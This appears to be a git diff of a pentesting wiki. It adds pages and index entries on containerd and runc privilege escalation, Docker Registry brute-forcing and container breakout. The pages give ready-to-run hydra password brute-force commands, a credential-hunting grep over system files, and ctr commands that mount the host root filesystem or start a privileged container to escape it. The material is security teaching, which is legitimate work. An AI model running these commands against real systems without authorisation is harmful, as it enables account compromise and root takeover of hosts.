SecLoop
diff --git a/‎.gitbook/assets/image (172).png
4.59 KB b/‎.gitbook/assets/image (172).png
4.59 KB
diff --git a/‎.gitbook/assets/image (407).png
4.59 KB b/‎.gitbook/assets/image (407).png
4.59 KB
diff --git a/‎SUMMARY.md
+5-2 b/‎SUMMARY.md
+5-2
diff --git a/‎brute-force.md
+8-2 b/‎brute-force.md
+8-2
diff --git a/‎linux-unix/privilege-escalation/README.md
+13-1 b/‎linux-unix/privilege-escalation/README.md
+13-1
diff --git a/‎linux-unix/privilege-escalation/containerd-ctr-privilege-escalation.md
+45 b/‎linux-unix/privilege-escalation/containerd-ctr-privilege-escalation.md
+45
@@ -24,9 +24,9 @@
 
 * [Checklist - Linux Privilege Escalation](linux-unix/linux-privilege-escalation-checklist.md)
 * [Linux Privilege Escalation](linux-unix/privilege-escalation/README.md)
-  * [Splunk LPE and Persistence](linux-unix/privilege-escalation/splunk-lpe-and-persistence.md)
+  * [Containerd \(ctr\) Privilege Escalation](linux-unix/privilege-escalation/containerd-ctr-privilege-escalation.md)
   * [electron/CEF/chromium debugger abuse](linux-unix/privilege-escalation/electron-cef-chromium-debugger-abuse.md)
-  * [Escaping from a Docker container](linux-unix/privilege-escalation/escaping-from-a-docker-container.md)
+  * [Docker Breakout](linux-unix/privilege-escalation/docker-breakout.md)
   * [Escaping from restricted shells - Jails](linux-unix/privilege-escalation/escaping-from-limited-bash.md)
   * [Cisco - vmanage](linux-unix/privilege-escalation/cisco-vmanage.md)
   * [D-Bus Enumeration & Command Injection Privilege Escalation](linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.md)
@@ -35,6 +35,8 @@
   * [ld.so exploit example](linux-unix/privilege-escalation/ld.so.conf-example.md)
   * [Linux Capabilities](linux-unix/privilege-escalation/linux-capabilities.md)
   * [NFS no\_root\_squash/no\_all\_squash misconfiguration PE](linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md)
+  * [RunC Privilege Escalation](linux-unix/privilege-escalation/runc-privilege-escalation.md)
+  * [Splunk LPE and Persistence](linux-unix/privilege-escalation/splunk-lpe-and-persistence.md)
   * [SSH Forward Agent exploitation](linux-unix/privilege-escalation/ssh-forward-agent-exploitation.md)
   * [Socket Command Injection](linux-unix/privilege-escalation/socket-command-injection.md)
   * [Payloads to execute](linux-unix/privilege-escalation/payloads-to-execute.md)
@@ -269,6 +271,7 @@
 * [3389 - Pentesting RDP](pentesting/pentesting-rdp.md)
 * [3632 - Pentesting distcc](pentesting/3632-pentesting-distcc.md)
 * [4369 - Pentesting Erlang Port Mapper Daemon \(epmd\)](pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd.md)
+* [5000 - Pentesting Docker Registry](pentesting/5000-pentesting-docker-registry.md)
 * [5353/UDP Multicast DNS \(mDNS\)](pentesting/5353-udp-multicast-dns-mdns.md)
 * [5432,5433 - Pentesting Postgresql](pentesting/pentesting-postgresql.md)
 * [5671,5672 - Pentesting AMQP](pentesting/5671-5672-pentesting-amqp.md)
 
@@ -87,13 +87,19 @@ nmap --script cassandra-brute -p 9160 <IP>
 
 ```bash
 msf> use auxiliary/scanner/couchdb/couchdb_login
-hydra /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 5984 http-get /
+hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 5984 http-get /
+```
+
+### Docker Registry
+
+```text
+hydra -L /usr/share/brutex/wordlists/simple-users.txt  -P /usr/share/brutex/wordlists/password.lst 10.10.10.10 -s 5000 https-get /v2/
 ```
 
 ### Elasticsearch
 
 ```text
-hydra /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 9200 http-get /
+hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 9200 http-get /
 ```
 
 ### FTP
 
@@ -166,7 +166,7 @@ grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc
 Enumerate useful binaries
 
 ```bash
-which nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch docker lxc rkt kubectl 2>/dev/null
+which nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch docker lxc ctr runc rkt kubectl 2>/dev/null
 ```
 
 Also, check if **any compiler is installed**. This is useful if you need to use some kernel exploit as it's recommended to compile it in the machine where you are going to use it \(or in one similar\)
@@ -521,6 +521,18 @@ Now, you can execute commands on the container from this `socat` connection.
 
 Note that if you have write permissions over the docker socket because you are **inside the group `docker`** you have [**more ways to escalate privileges**](interesting-groups-linux-pe/#docker-group). If the [**docker API is listening in a port** you can also be able to compromise it](../../pentesting/2375-pentesting-docker.md#compromising).
 
+### Containerd \(ctr\) privilege escalation
+
+If you find that you can use the **`ctr`** command read the following page as **you may be able to abuse it to escalate privileges**:
+
+{% page-ref page="containerd-ctr-privilege-escalation.md" %}
+
+### **RunC** privilege escalation
+
+If you find that you can use the **`runc`** command read the following page as **you may be able to abuse it to escalate privileges**:
+
+{% page-ref page="runc-privilege-escalation.md" %}
+
 ## **D-Bus**
 
 D-BUS is an **inter-process communication \(IPC\) system**, providing a simple yet powerful mechanism **allowing applications to talk to one another**, communicate information and request services. D-BUS was designed from scratch to fulfil the needs of a modern Linux system.
 
@@ -0,0 +1,45 @@
+# Containerd \(ctr\) Privilege Escalation
+
+## Basic information
+
+Go to the following link to learn **what is containerd** and `ctr`:
+
+{% page-ref page="../../pentesting/2375-pentesting-docker.md" %}
+
+## PE 1
+
+if you find that a host contains the `ctr` command:
+
+```bash
+which ctr
+/usr/bin/ctr
+```
+
+You can list the images:
+
+```bash
+ctr image list
+REF                                  TYPE                                                 DIGEST                                                                  SIZE      PLATFORMS   LABELS 
+registry:5000/alpine:latest application/vnd.docker.distribution.manifest.v2+json sha256:0565dfc4f13e1df6a2ba35e8ad549b7cb8ce6bccbc472ba69e3fe9326f186fe2 100.1 MiB linux/amd64 -      
+registry:5000/ubuntu:latest application/vnd.docker.distribution.manifest.v2+json sha256:ea80198bccd78360e4a36eb43f386134b837455dc5ad03236d97133f3ed3571a 302.8 MiB linux/amd64 -      
+```
+
+And then **run one of those images mounting the host root folder to it**:
+
+```bash
+ctr run --mount type=bind,src=/,dst=/,options=rbind -t registry:5000/ubuntu:latest ubuntu bash
+```
+
+## PE 2
+
+Run a container privileged and escape from it.  
+You can run a privileged container as:
+
+```bash
+ ctr run --privileged --net-host -t registry:5000/modified-ubuntu:latest ubuntu bash
+```
+
+Then you can use some of the techniques mentioned in the following page to **escape from it abusing privileged capabilities**:
+
+{% page-ref page="docker-breakout.md" %}
+